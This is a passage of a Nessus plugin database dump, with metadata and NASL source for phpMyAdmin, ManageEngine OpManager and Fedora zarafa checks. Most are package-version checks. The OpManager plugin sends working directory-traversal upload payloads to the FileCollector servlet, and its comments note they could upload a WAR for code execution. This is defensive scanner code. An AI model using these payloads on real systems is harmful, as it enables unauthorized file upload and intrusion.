!~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.6-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:07:48", "references": ["http://www.nessus.org/u?1aafba98", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php", "http://www.nessus.org/u?79fdaa0b", "http://www.nessus.org/u?91815216", "http://www.nessus.org/u?55cf9587", "http://www.nessus.org/u?97997036", "http://www.nessus.org/u?8cdbf2d1", "http://www.nessus.org/u?7abe0a00", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php", "http://www.nessus.org/u?c3bfc267", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php", "http://www.nessus.org/u?545bac7a", "http://www.nessus.org/u?67967469"], "pluginID": "76915", "description": "According to its self-reported version number, the phpMyAdmin install hosted on the remote web server is 4.0.x prior to 4.0.10.1, 4.1.x prior to 4.1.14.2, or 4.2.x prior to 4.2.6. It is, therefore, affected by the following vulnerabilities :\n\n - The 'TABLE_COMMENT' parameter input is not being validated in the script 'libraries/structure.lib.php' and could allow cross-site scripting attacks. Note that this issue affects the 4.2.x branch. (CVE-2014-4954)\n\n - The 'trigger' parameter input is not being validated in the script 'libraries/rte/rte_list.lib.php' and could allow cross-site scripting attacks. (CVE-2014-4955)\n\n - The 'table' and 'curr_column_name' parameter inputs are not being validated in the scripts 'js/functions.js' and 'js/tbl_structure.js' respectively and could allow cross-site scripting attacks. (CVE-2014-4986)\n\n - The script 'server_user_groups.php' contains an error that could allow a remote attacker to obtain the MySQL user list and possibly make changes to the application display. Note this issue only affects the 4.1.x and 4.2.x branches. (CVE-2014-4987)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 5, "reporter": "Tenable", "published": "2014-07-30T00:00:00", "title": "phpMyAdmin 4.0.x < 4.0.10.1 / 4.1.x < 4.1.14.2 / 4.2.x < 4.2.6 Multiple Vulnerabilities (PMASA-2014-4 - PMASA-2014-7)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4954", "CVE-2014-4986", "CVE-2014-4955", "CVE-2014-4987"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_7.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76915", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76915);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\n \"CVE-2014-4954\",\n \"CVE-2014-4955\",\n \"CVE-2014-4986\",\n \"CVE-2014-4987\"\n );\n script_bugtraq_id(68798, 68799, 68803, 68804);\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.1 / 4.1.x < 4.1.14.2 / 4.2.x < 4.2.6 Multiple Vulnerabilities (PMASA-2014-4 - PMASA-2014-7)\");\n script_summary(english:\"Checks the version of phpMyAdmin.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin install\nhosted on the remote web server is 4.0.x prior to 4.0.10.1, 4.1.x\nprior to 4.1.14.2, or 4.2.x prior to 4.2.6. It is, therefore, affected\nby the following vulnerabilities :\n\n - The 'TABLE_COMMENT' parameter input is not being\n validated in the script 'libraries/structure.lib.php'\n and could allow cross-site scripting attacks. Note that\n this issue affects the 4.2.x branch. (CVE-2014-4954)\n\n - The 'trigger' parameter input is not being validated in\n the script 'libraries/rte/rte_list.lib.php' and could\n allow cross-site scripting attacks. (CVE-2014-4955)\n\n - The 'table' and 'curr_column_name' parameter inputs are\n not being validated in the scripts 'js/functions.js'\n and 'js/tbl_structure.js' respectively and could allow\n cross-site scripting attacks. (CVE-2014-4986)\n\n - The script 'server_user_groups.php' contains an error\n that could allow a remote attacker to obtain the MySQL\n user list and possibly make changes to the application\n display. Note this issue only affects the 4.1.x and\n 4.2.x branches. (CVE-2014-4987)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://sourceforge.net/p/phpmyadmin/news/2014/07/phpmyadmin-40101-41142-and-426-are-released/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?545bac7a\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/57475371a5b515c83bfc1bb2efcdf3ddb14787ed\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91815216\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/10014d4dc596b9e3a491bf04f3e708cf1887d5e1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8cdbf2d1\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/511c596b175889b8e6b9c423e352ca64fa20af2b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1aafba98\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/1b5592435617fa1b9dd68e2dc263de64c69fdc8a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?67967469\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/29a1f56495a7d1d98da31a614f23c0819a606a4d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3bfc267\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/cd5697027a2ee7e1f7d7000b23be6051cdb0516c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97997036\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/a92753bd65e1f8b72c46ed3dda6c362628e0daf7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79fdaa0b\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/395265e9937beb21134626c01a21f44b28e712e5\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7abe0a00\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/45550b8cff06ad128129020762f9b53d125a6934\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?55cf9587\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to phpMyAdmin 4.0.10.1 / 4.1.14.2 / 4.2.6 or later, or\napply the patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"phpMyAdmin\", url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, \"phpMyAdmin\", port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, \"phpMyAdmin 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.1\n# 4.1.x < 4.1.14.2\n# 4.2.x < 4.2.6\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = '4.0.0';\n fixed_ver = '4.0.10.1';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.2';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.6';\n}\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"phpMyAdmin\", url, version);\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:44:51", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php", "http://www.nessus.org/u?222088c0", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php"], "pluginID": "76600", "description": "The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in database structure page.\n\nWith a crafted table comment, it is possible to trigger an XSS in database structure page.\n\nSelf-XSS due to unescaped HTML output in database triggers page.\n\nWhen navigating into the database triggers page, it is possible to trigger an XSS with a crafted trigger name.\n\nMultiple XSS in AJAX confirmation messages.\n\nWith a crafted column name it is possible to trigger an XSS when dropping the column in table structure page. With a crafted table name it is possible to trigger an XSS when dropping or truncating the table in table operations page.\n\nAccess for an unprivileged user to MySQL user list.\n\nAn unpriviledged user could view the MySQL user list and manipulate the tabs displayed in phpMyAdmin for them.", "edition": 4, "reporter": "Tenable", "published": "2014-07-20T00:00:00", "title": "FreeBSD : phpMyAdmin -- multiple XSS vulnerabilities, missing validation (3f09ca29-0e48-11e4-b17a-6805ca0b3d42)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4954", "CVE-2014-4986", "CVE-2014-4955", "CVE-2014-4987"], "modified": "2014-07-22T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:phpMyAdmin"], "id": "FREEBSD_PKG_3F09CA290E4811E4B17A6805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76600", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2014 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76600);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2014/07/22 10:41:54 $\");\n\n script_cve_id(\"CVE-2014-4954\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- multiple XSS vulnerabilities, missing validation (3f09ca29-0e48-11e4-b17a-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in database structure page.\n\nWith a crafted table comment, it is possible to trigger an XSS in\ndatabase structure page.\n\nSelf-XSS due to unescaped HTML output in database triggers page.\n\nWhen navigating into the database triggers page, it is possible to\ntrigger an XSS with a crafted trigger name.\n\nMultiple XSS in AJAX confirmation messages.\n\nWith a crafted column name it is possible to trigger an XSS when\ndropping the column in table structure page. With a crafted table name\nit is possible to trigger an XSS when dropping or truncating the table\nin table operations page.\n\nAccess for an unprivileged user to MySQL user list.\n\nAn unpriviledged user could view the MySQL user list and manipulate\nthe tabs displayed in phpMyAdmin for them.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\"\n );\n # http://www.freebsd.org/ports/portaudit/3f09ca29-0e48-11e4-b17a-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?222088c0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:54:50", "references": ["http://www.nessus.org/u?6b48dd0a", "http://seclists.org/fulldisclosure/2014/Sep/110"], "pluginID": "81378", "description": "The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize user-supplied input to the 'regionID' and 'FILENAME' parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize user-supplied input to the 'fileName' parameter. This allows a remote attacker and authenticated users to delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.", "edition": 7, "reporter": "Tenable", "published": "2015-02-16T00:00:00", "title": "ManageEngine OpManager Multiple Directory Traversal Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2018-06-14T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81378", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81378);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2014-6034\", \"CVE-2014-6035\", \"CVE-2014-6036\");\n script_bugtraq_id(70167, 70169, 70172);\n\n script_name(english:\"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities\");\n script_summary(english:\"Attempts to upload a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby multiple directory traversal vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine OpManager installed on the remote host is\naffected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize\n user-supplied input to the 'regionID' and 'FILENAME'\n parameters when uploading files. This allows a remote\n attacker and authenticated users to write to and\n execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize\n user-supplied input to the 'fileName' parameter. This\n allows a remote attacker and authenticated users to\n delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file\nupload vulnerabilities; however, it did not test for the arbitrary\ncode execution or file deletion vulnerabilities. If a file can be\nuploaded via the directory traversal attack, then the execution and\ndeletion flaws are likely exploitable as well.\");\n # https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b48dd0a\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Sep/110\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine OpManager version 11.3 and apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine OpManager FileCollector Servlet File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine OpManager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\nunique = rand_str(length:10);\nfile = \"nessus_delete_this_file_\" + unique + \".css\";\n\n# Try to upload a CSS file\n# While we don't try to upload a WAR file directly, if we can\n# upload a CSS file we could use the same request to upload a WAR\n# file which would allow for remote code execution\npostdata = 'Nessus Check: '+unique;\n\n# Couple of vectors to test\nvectors = make_list(\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/\"+file,\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=..\\\\..\\\\..\\\\webclient\\\\common\\\\css\\\\\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME=\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\\\..\\\\..\\\\webclient\\\\common\\\\css&FILENAME=\"+file\n);\n\nuploaded = FALSE;\nexecuted = FALSE;\nvecurl = \"\";\nforeach vector (vectors)\n{\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : dir+vector,\n data : postdata,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n\n # Try and access our uploaded file\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"webclient/common/css/\" +file,\n exit_on_fail : TRUE\n );\n\n # Only need to upload one file\n if(\"Nessus Check: \"+unique >< res[2])\n {\n uploaded = TRUE;\n vecurl = vector;\n break;\n }\n}\n\nif (uploaded)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : dir+\"webclient/common/css/\"+file,\n line_limit : 10,\n request : make_list(exp_request),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-06T01:58:30", "references": ["http://www.nessus.org/u?8953ecaf", "https://bugzilla.redhat.com/show_bug.cgi?id=1133439"], "pluginID": "77484", "description": "Fixed multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2014-09-03T00:00:00", "title": "Fedora 19 : zarafa-7.1.10-4.fc19 (2014-9768)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "modified": "2018-09-05T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:zarafa"], "id": "FEDORA_2014-9768.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77484", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9768.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77484);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/09/05 12:31:21\");\n\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(69362, 69365, 69369, 69370);\n script_xref(name:\"FEDORA\", value:\"2014-9768\");\n\n script_name(english:\"Fedora 19 : zarafa-7.1.10-4.fc19 (2014-9768)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixed multiple incorrect default permissions (CVE-2014-5447,\nCVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1133439\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137232.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8953ecaf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zarafa package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = 